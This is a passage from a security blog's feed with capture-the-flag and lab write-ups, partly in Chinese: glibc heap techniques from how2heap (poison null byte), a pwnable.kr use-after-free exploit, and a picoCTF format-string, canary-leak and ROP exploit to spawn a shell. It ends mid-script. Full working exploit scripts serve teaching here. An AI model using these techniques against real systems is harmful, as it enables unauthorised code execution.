<span class="o">&amp;</span><span class="n">fake_chunks</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> <span class="n">free</span><span class="p">(</span><span class="n">a</span><span class="p">);</span> <span class="c1">// 4</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"malloc(0x30): %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x30</span><span class="p">));</span> <span class="p">}</span> </code></pre></div></div> <p>代码被划分为4个步骤:</p> <ol> <li> <p>分配一块内存,为了初始化堆</p> <p>初始化a,以及一个10*8大小的数组fake_chunk</p> </li> <li> <p>fake_chunk 被划分为两个chunk,第一个chunk的大小0x40,写在chunk头部即 <code class="language-plaintext highlighter-rouge">fake_chunks[1]</code>的地址,第二个chunk的大小是0x1234, 写在<code class="language-plaintext highlighter-rouge">fake_chunks[9]</code>,因为 0x40/8 = 8,所以向后+8。</p> <p>这里需要注意的是第二个chunk size要能绕过检查,即 2*SIZE &lt; x &lt; 128kb</p> </li> <li> <p>a被赋值为fake_chunks[2]的地址,即fake_chunk中第一个chunk的mem指针,随后free。</p> <p>free完成后fastbin中就多了一个fake_chunk[2]的地址</p> </li> <li> <p>这步malloc就会将fastbin中的chunk取出使用</p> </li> </ol> <h2 id="poison_null_byte">poison_null_byte</h2> <p>移除了部分注释,将代码拆解成了14部分</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">a</span><span class="p">;</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">b</span><span class="p">;</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">c</span><span class="p">;</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">b1</span><span class="p">;</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">b2</span><span class="p">;</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">d</span><span class="p">;</span> <span class="kt">void</span> <span class="o">*</span><span class="n">barrier</span><span class="p">;</span> <span class="c1">// 1</span> <span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span> <span class="kt">int</span> <span class="n">real_a_size</span> <span class="o">=</span> <span class="n">malloc_usable_size</span><span class="p">(</span><span class="n">a</span><span class="p">);</span> <span class="c1">// 2</span> <span class="n">b</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x200</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"b: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">b</span><span class="p">);</span> <span class="c1">// 3</span> <span class="n">c</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"c: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">c</span><span class="p">);</span> <span class="c1">// 4</span> <span class="n">barrier</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"We allocate a barrier at %p, so that c is not consolidated with the top-chunk when freed.</span><span class="se">\n</span><span class="s">"</span> <span class="s">"The barrier is not strictly necessary, but makes things less confusing</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">barrier</span><span class="p">);</span> <span class="c1">// 5</span> <span class="kt">uint64_t</span><span class="o">*</span> <span class="n">b_size_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)(</span><span class="n">b</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span> <span class="c1">// 6</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)(</span><span class="n">b</span><span class="o">+</span><span class="mh">0x1f0</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x200</span><span class="p">;</span> <span class="c1">// 7</span> <span class="n">free</span><span class="p">(</span><span class="n">b</span><span class="p">);</span> <span class="c1">// 8</span> <span class="n">a</span><span class="p">[</span><span class="n">real_a_size</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// &lt;--- THIS IS THE "EXPLOITED BUG"</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"b.size: %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">*</span><span class="n">b_size_ptr</span><span class="p">);</span> <span class="c1">// 9</span> <span class="kt">uint64_t</span><span class="o">*</span> <span class="n">c_prev_size_ptr</span> <span class="o">=</span> <span class="p">((</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)</span><span class="n">c</span><span class="p">)</span><span class="o">-</span><span class="mi">2</span><span class="p">;</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"c.prev_size is %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="o">*</span><span class="n">c_prev_size_ptr</span><span class="p">);</span> <span class="c1">// 10</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"We will pass the check since chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">*</span><span class="p">((</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)(</span><span class="n">b</span><span class="o">-</span><span class="mh">0x8</span><span class="p">)),</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)(</span><span class="n">b</span><span class="o">-</span><span class="mh">0x10</span> <span class="o">+</span> <span class="o">*</span><span class="p">((</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)(</span><span class="n">b</span><span class="o">-</span><span class="mh">0x8</span><span class="p">))));</span> <span class="n">b1</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span> <span class="c1">// 11</span> <span class="n">b2</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x80</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"b2: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">b2</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="n">b2</span><span class="p">,</span><span class="sc">'B'</span><span class="p">,</span><span class="mh">0x80</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Current b2 content:</span><span class="se">\n</span><span class="s">%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">b2</span><span class="p">);</span> <span class="c1">// 12</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now we free 'b1' and 'c': this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">b1</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">c</span><span class="p">);</span> <span class="c1">// 13</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Finally, we allocate 'd', overlapping 'b2'.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">d</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x300</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"d: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">d</span><span class="p">);</span> <span class="c1">// 14</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now 'd' and 'b2' overlap.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="n">d</span><span class="p">,</span><span class="sc">'D'</span><span class="p">,</span><span class="mh">0x300</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"New b2 content:</span><span class="se">\n</span><span class="s">%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">b2</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Thanks to https://www.contextis.com/resources/white-papers/glibc-adventures-the-forgotten-chunks"</span> <span class="s">"for the clear explanation of this technique.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <ol> <li>a 分配了0x100个字节,并获取了它实际可用大小0x108。用于之后溢出 (<code class="language-plaintext highlighter-rouge">off-by-one</code>)</li> <li>b 分配了0x200个字节,实际0x210</li> <li>c 分配了0x100个字节,实际0x110</li> <li>barrie 分配了0x100个字节。用于避免c被合并到topchunk中</li> <li>b_size_ptr 被赋值为b - 8的地址,即b chunk大小字段地址</li> <li> <p>b+0x1f0 被赋值为0x200。是为了之后触发unlink(b)的时候绕过<a href="https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=17f487b7afa7cd6c316040f3e6c86dc96b2eec30">chunk_size == next-&gt;prev-&gt;chunk_size</a>的检查。</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="cp">#define unlink(AV, P, BK, FD) { \ if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \ malloc_printerr (check_action, "corrupted size vs. prev_size", P, AV); \ </span></code></pre></div> </div> <ul> <li>因为b的size被覆盖了一个NULL字节,chunk_size(b) == 0x200</li> <li><code class="language-plaintext highlighter-rouge">b - 0x10 + 0x200</code>即 <code class="language-plaintext highlighter-rouge">b + 0x1f0</code> 理论上就是next_chunk-&gt;prev_size字段,所以这里被赋值为0x200</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">free(b)</code> 即b被加入unsortedBin</li> <li>a[108] 被赋值为0,即溢出了一个NULL字节,bsize现在等于0x200</li> <li>c_prev_size_ptr被赋值为c - 2,此时是0x210</li> <li>b1 分配了0x100个字节,这一步触发了<code class="language-plaintext highlighter-rouge">unlink(b)</code>,此时b的前0x100个字节被分配给了b1。理论上来说c_prev_size_ptr指针的值应当会改变,但目前仍然是0x210,因为源码是根据b以及b size的偏移来更改的,所以实际被更改的是c-4的地址的值。</li> <li>b2 分配了0x80,也是从原先的b chunk中分割出来的,全部用字符’B’填充</li> <li>释放b1和c。释放c的时候由于prev_size还是0x211,导致c向前合并0x210个字节。而中间的b2被无视了。。</li> <li>d 分配了0x300字节,指向的是b chunk,大小是size(b + c) 即0x300。此时d和b2已经重叠了。</li> <li>d被塞满了字符’D’,导致b2内容被更改</li> </ol> <p>作者在代码末尾提到的paper中有张图诠释的很好:</p> <p><img src="../assets/images/poison_null_byte.png" alt="poison_null_byte" /></p> Fri, 04 Dec 2020 00:00:00 +0000 https://clot.github.io//how2heap-1 https://clot.github.io/how2heap-1 pwnable.kr - uaf (C++) <p>It’s my first time to pwn with a C++ challenge. So I need to note something here.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh uaf@pwnable.kr <span class="nt">-p2222</span> <span class="o">(</span>pw:guest<span class="o">)</span> </code></pre></div></div> <h2 id="code-review">Code Review</h2> <p>3 choices:</p> <ol> <li> <p>call the virtual function(<code class="language-plaintext highlighter-rouge">introduce</code>) of two objects</p> </li> <li> <p>allocate a memory chunk with arg1 size then read data from arg2 to fill that</p> </li> <li> <p>delete two objects</p> </li> </ol> <h2 id="find-the-exploitation">Find the exploitation</h2> <p>As the name tells, the exploit is uaf, so there is a vulnability afte delete two objects.</p> <p>Our target is call the virtual function: <code class="language-plaintext highlighter-rouge">give_shell()</code>, the first choice call the other virtual function, maybe we can cover that function point.</p> <p>so our plan is:</p> <ol> <li> <p>input 3 to delete two objects</p> </li> <li> <p>allocate some useful data on the deleted memory with choice 2</p> </li> <li> <p>reuse freed memory to call the virtual function with choice 1</p> </li> </ol> <h2 id="solution">Solution</h2> <p>If we want to reuse the deleted memory, we need to set the arg1 that equals size of <code class="language-plaintext highlighter-rouge">man</code> object. so,</p> <ol> <li>we need to figure out the chunk size of <code class="language-plaintext highlighter-rouge">man</code> or <code class="language-plaintext highlighter-rouge">Woman</code> objects.</li> </ol> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 0x0000000000400ef7 &lt;+51&gt;: lea r12,[rbp-0x50] 0x0000000000400efb &lt;+55&gt;: mov edi,0x18 0x0000000000400f00 &lt;+60&gt;: call 0x400d90 &lt;_Znwm@plt&gt; </code></pre></div></div> <p>the <code class="language-plaintext highlighter-rouge">_Znwm@plt</code> is <code class="language-plaintext highlighter-rouge">new</code> function, so <code class="language-plaintext highlighter-rouge">0x18</code>is the object size.</p> <ol> <li>next, wo need to hijacking the virtual function pointer to <code class="language-plaintext highlighter-rouge">get_shell</code>. so what about the layout of virtual function address?</li> </ol> <p>the below asm code is calling virtual function:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 0x0000000000400fcd &lt;+265&gt;: mov rax,QWORD PTR <span class="o">[</span>rbp-0x38] 0x0000000000400fd1 &lt;+269&gt;: mov rax,QWORD PTR <span class="o">[</span>rax] 0x0000000000400fd4 &lt;+272&gt;: add rax,0x8 0x0000000000400fd8 &lt;+276&gt;: mov rdx,QWORD PTR <span class="o">[</span>rax] 0x0000000000400fdb &lt;+279&gt;: mov rax,QWORD PTR <span class="o">[</span>rbp-0x38] 0x0000000000400fdf &lt;+283&gt;: mov rdi,rax 0x0000000000400fe2 &lt;+286&gt;: call rdx 0x0000000000400fe4 &lt;+288&gt;: mov rax,QWORD PTR <span class="o">[</span>rbp-0x30] 0x0000000000400fe8 &lt;+292&gt;: mov rax,QWORD PTR <span class="o">[</span>rax] 0x0000000000400feb &lt;+295&gt;: add rax,0x8 0x0000000000400fef &lt;+299&gt;: mov rdx,QWORD PTR <span class="o">[</span>rax] 0x0000000000400ff2 &lt;+302&gt;: mov rax,QWORD PTR <span class="o">[</span>rbp-0x30] 0x0000000000400ff6 &lt;+306&gt;: mov rdi,rax 0x0000000000400ff9 &lt;+309&gt;: call rdx </code></pre></div></div> <p>so rdx is function address, the rdx is from [rax], the rax is from [rax] + 8, so the rax contain the pointer to the virtual function table, introduce() is the second pointer because of the offset 8.</p> <p>the rax is from rbp-0x38, so it’s the pointer of the object.</p> <p>Let’s see what’s in the rax:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/2gx <span class="nv">$rax</span> 0x401570 &lt;_ZTV3Man+16&gt;: 0x000000000040117a 0x00000000004012d2 pwndbg&gt; x/5i 0x000000000040117a 0x40117a &lt;_ZN5Human10give_shellEv&gt;: push rbp 0x40117b &lt;_ZN5Human10give_shellEv+1&gt;: mov rbp,rsp 0x40117e &lt;_ZN5Human10give_shellEv+4&gt;: sub rsp,0x10 0x401182 &lt;_ZN5Human10give_shellEv+8&gt;: mov QWORD PTR <span class="o">[</span>rbp-0x8],rdi 0x401186 &lt;_ZN5Human10give_shellEv+12&gt;: mov edi,0x4014a8 pwndbg&gt; x/5i 0x00000000004012d2 0x4012d2 &lt;_ZN3Man9introduceEv&gt;: push rbp 0x4012d3 &lt;_ZN3Man9introduceEv+1&gt;: mov rbp,rsp 0x4012d6 &lt;_ZN3Man9introduceEv+4&gt;: sub rsp,0x10 0x4012da &lt;_ZN3Man9introduceEv+8&gt;: mov QWORD PTR <span class="o">[</span>rbp-0x8],rdi 0x4012de &lt;_ZN3Man9introduceEv+12&gt;: mov rax,QWORD PTR <span class="o">[</span>rbp-0x8] </code></pre></div></div> <p>As we have seen:</p> <p><code class="language-plaintext highlighter-rouge">get_shell</code> address: Object-&gt;vptr-&gt;v1</p> <p><code class="language-plaintext highlighter-rouge">introduce</code> address: Object-&gt;vptr-&gt;(v1 + 8)</p> <p>so we need to cover vptr address that after add 8 equal the address of <code class="language-plaintext highlighter-rouge">get_shell</code>(0x401570).</p> <p>The current address is 0x401570, so we need to fill <code class="language-plaintext highlighter-rouge">0x401570 - 8 = 0x401568</code></p> <p>but still a problem:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span><span class="k">*</span><span class="o">]</span> Switching to interactive mode <span class="o">[</span><span class="k">*</span><span class="o">]</span> Got EOF <span class="k">while </span>reading <span class="k">in </span>interactive </code></pre></div></div> <p>Because the 3rd choice has deleted two objects, however we just allocate one object, the program will crash when executing first choice. so we need to allocate two memory chunks by input 2 twice.</p> <p>the final exploitation:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">host</span> <span class="o">=</span> <span class="s">'pwnable.kr'</span> <span class="n">port</span> <span class="o">=</span> <span class="mi">2222</span> <span class="n">user</span> <span class="o">=</span> <span class="s">'uaf'</span> <span class="n">password</span> <span class="o">=</span> <span class="s">'guest'</span> <span class="n">s</span> <span class="o">=</span> <span class="n">ssh</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="o">=</span><span class="n">port</span><span class="p">,</span> <span class="n">user</span><span class="o">=</span><span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="n">password</span><span class="p">)</span> <span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s">'debug'</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x401568</span><span class="p">)</span> <span class="n">p</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">process</span><span class="p">([</span><span class="s">"./uaf"</span><span class="p">,</span> <span class="s">"24"</span><span class="p">,</span> <span class="s">"/dev/stdin"</span><span class="p">])</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'free</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'3'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'free</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'2'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'free</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'2'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'free</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">'1'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <p>Finally:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span><span class="k">*</span><span class="o">]</span> Switching to interactive mode <span class="nv">$ </span><span class="nb">ls </span>flag uaf uaf.cpp <span class="nv">$ </span><span class="nb">cat </span>flag yay_f1ag_aft3r_pwning </code></pre></div></div> Wed, 18 Nov 2020 00:00:00 +0000 https://clot.github.io//pwnable.kr-uaf-(C++) https://clot.github.io/pwnable.kr-uaf-(C++) picoCTF - Guessing Game 2 <p><a href="https://play.picoctf.org/practice/challenge/89?category=6&amp;page=1">picoCTF - GuessingGame2</a></p> <h2 id="analysis">Analysis</h2> <p>输入随机数确认成功,输入名字后可以bof</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">win</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">winner</span><span class="p">[</span><span class="n">BUFSIZE</span><span class="p">];</span> <span class="n">printf</span><span class="p">(</span><span class="s">"New winner!</span><span class="se">\n</span><span class="s">Name? "</span><span class="p">);</span> <span class="n">gets</span><span class="p">(</span><span class="n">winner</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Congrats: "</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="n">winner</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>这里的<code class="language-plaintext highlighter-rouge">printf(winner)</code>存在字符串格式漏洞利用,可以通过类似<code class="language-plaintext highlighter-rouge">%n$p</code>的方法来获得找到第n个参数位置保存的值</p> <p>检查下保护:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="s1">'/home/clot/CTF/GuessGame2/vuln'</span> Arch: i386-32-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE <span class="o">(</span>0x8048000<span class="o">)</span> </code></pre></div></div> <p>可以看到有Canary,那就可以通过字符串格式漏洞来找到这个canary来绕过。</p> <h2 id="solution">Solution</h2> <ol> <li> <p>确认随机数</p> </li> <li> <p>leak libc里puts的地址,获得libc的基地址,生成<code class="language-plaintext highlighter-rouge">system</code>和<code class="language-plaintext highlighter-rouge">/bin/sh</code>的地址</p> </li> <li> <p>leak canary的地址</p> </li> <li> <p>构造payload来exploit</p> </li> </ol> <h2 id="random-number">Random Number</h2> <p>这里的随机数由于服务器和本地libc版本的不同,导致生成的随机数是不同的。</p> <p>当时在随机数上浪费了很多不该浪费的时间,本来是想过暴力破解,但是觉得好慢,就在考虑是不是有别的办法。</p> <p>程序中是通过<code class="language-plaintext highlighter-rouge">rand</code>的地址来计算的,然后模上了4096,相当于是&amp;0xfff的操作,那我只要知道这个rand在libc里的地址的后三位就可以了。</p> <p>我通过GuessingGame1获得的shell,上去就是<code class="language-plaintext highlighter-rouge">lld --version</code>,当场我就获得了<code class="language-plaintext highlighter-rouge">libc-2.27</code>的信息..</p> <p>然而由于对libc版本命名的不理解,导致两次搞错libc的版本,尝试多次无果后,才用了暴力破解的方法。。最后得出结果是-31。</p> <h2 id="leak-libc-function-address">Leak libc function address</h2> <p>知道结果是-31后其实就知道了rand的在libc里的地址的后三位,通过<a href="https://libc.blukat.me/?q=system%3Ad80%2Crand%3Afe0&amp;l=libc6-i386_2.27-3ubuntu1.2_amd64">libc查询网站</a>查到对应的libc版本。</p> <p>对应的<code class="language-plaintext highlighter-rouge">system</code>和<code class="language-plaintext highlighter-rouge">str_bin_sh</code>的地址也就都能查到了,还缺一个libc的基地址。</p> <p>这里通过读取puts的GOT地址,来获得实际地址,可以通过ida或者pwntool获取:<code class="language-plaintext highlighter-rouge">elf.got["puts"]</code>,地址为<code class="language-plaintext highlighter-rouge">0x08049FDC</code></p> <p>然后我们需要通过输入的格式化字符串来读取这个地址里保存的值。先输入名字,通过gdb来观察下栈的布局:</p> <p><a href="https://imgchr.com/i/BXZqld"><img src="https://s1.ax1x.com/2020/11/11/BXZqld.jpg" alt="BXZqld.jpg" /></a></p> <p>这个断点是在准备printf输入的名字的时候断下的。字符串开头的<code class="language-plaintext highlighter-rouge">0x41414141</code>在<code class="language-plaintext highlighter-rouge">0xffffce3c</code>距离第一个参数地址<code class="language-plaintext highlighter-rouge">0xffffce20</code>7个4字节参数的位置,所以我们可以输入puts的GOT地址,然后用<code class="language-plaintext highlighter-rouge">%7$.4s</code>的格式化字符串来获取这个地址的值:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'guess?</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">n</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">Name? '</span><span class="p">)</span> <span class="n">padding</span> <span class="o">=</span> <span class="n">p32</span><span class="p">(</span><span class="n">putsGOTAddress</span><span class="p">)</span> <span class="n">padding</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"%7$.4s"</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">padding</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'Congrats: '</span><span class="p">)</span> <span class="n">data</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="n">u32</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">()[</span><span class="o">-</span><span class="mi">5</span><span class="p">:</span><span class="o">-</span><span class="mi">1</span><span class="p">]))</span> </code></pre></div></div> <p>最后的data便是puts的实际地址,通过以下方法来计算出system和binsh的地址</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">putsAddress</span> <span class="o">=</span> <span class="n">leakGOTAddress</span><span class="p">(</span><span class="n">puts</span><span class="p">)</span> <span class="n">baseAddress</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">putsAddress</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> <span class="o">-</span> <span class="n">libcPusts</span> <span class="n">systemAddress</span> <span class="o">=</span> <span class="n">baseAddress</span> <span class="o">+</span> <span class="n">systemLibc</span> <span class="n">binShAddr</span> <span class="o">=</span> <span class="n">baseAddress</span> <span class="o">+</span> <span class="n">binSh</span> </code></pre></div></div> <h2 id="bypass-canary">Bypass Canary</h2> <p>依然是用格式化字符串来leak,在ida中可以看到canary的位置:</p> <p><a href="https://imgchr.com/i/BXuM9S"><img src="https://s1.ax1x.com/2020/11/11/BXuM9S.png" alt="BXuM9S.png" /></a></p> <p>那么只要计算出这个canary距离我们的printf有多少个参数的距离就可以读取出来了:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg&gt; x/x <span class="nv">$ebp</span> - 0xc 0xffffd03c: 0x0f975a00 pwndbg&gt; p/d <span class="o">(</span>0xffffd03c - 0xffffce20<span class="o">)</span> / 4 <span class="nv">$1</span> <span class="o">=</span> 135 ... pwndbg&gt; c Continuing. New winner! Name? %135<span class="nv">$p</span> Congrats: 0xf975a00 </code></pre></div></div> <h2 id="rop">ROP</h2> <p>所需要的条件都已经获取到了,接下来就是拼装payload来ROP了,canary的地方依然放置canary的值,用system的地址覆盖掉返回地址,并在上面放置好参数<code class="language-plaintext highlighter-rouge">/bin/sh</code>。需要事先观察好栈的布局。</p> <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload</span> <span class="o">=</span> <span class="mi">512</span> <span class="o">*</span> <span class="sa">b</span><span class="s">'A'</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="n">systemAddress</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">binShAddr</span><span class="p">)</span> </code></pre></div></div> <h2 id="exploitation">Exploitation</h2> <p>完整的代码:</p> <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">REMOTE</span> <span class="o">=</span> <span class="mi">1</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">'./vuln'</span><span class="p">)</span> <span class="k">if</span> <span class="n">REMOTE</span><span class="p">:</span> <span class="n">host</span> <span class="o">=</span> <span class="s">'jupiter.challenges.picoctf.org'</span> <span class="n">port</span> <span class="o">=</span> <span class="s">'15815'</span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> <span class="n">n</span> <span class="o">=</span> <span class="s">'-31'</span> <span class="k">else</span><span class="p">:</span> <span class="n">p</span> <span class="o">=</span> <span class="n">elf</span><span class="p">.</span><span class="n">process</span><span class="p">()</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span 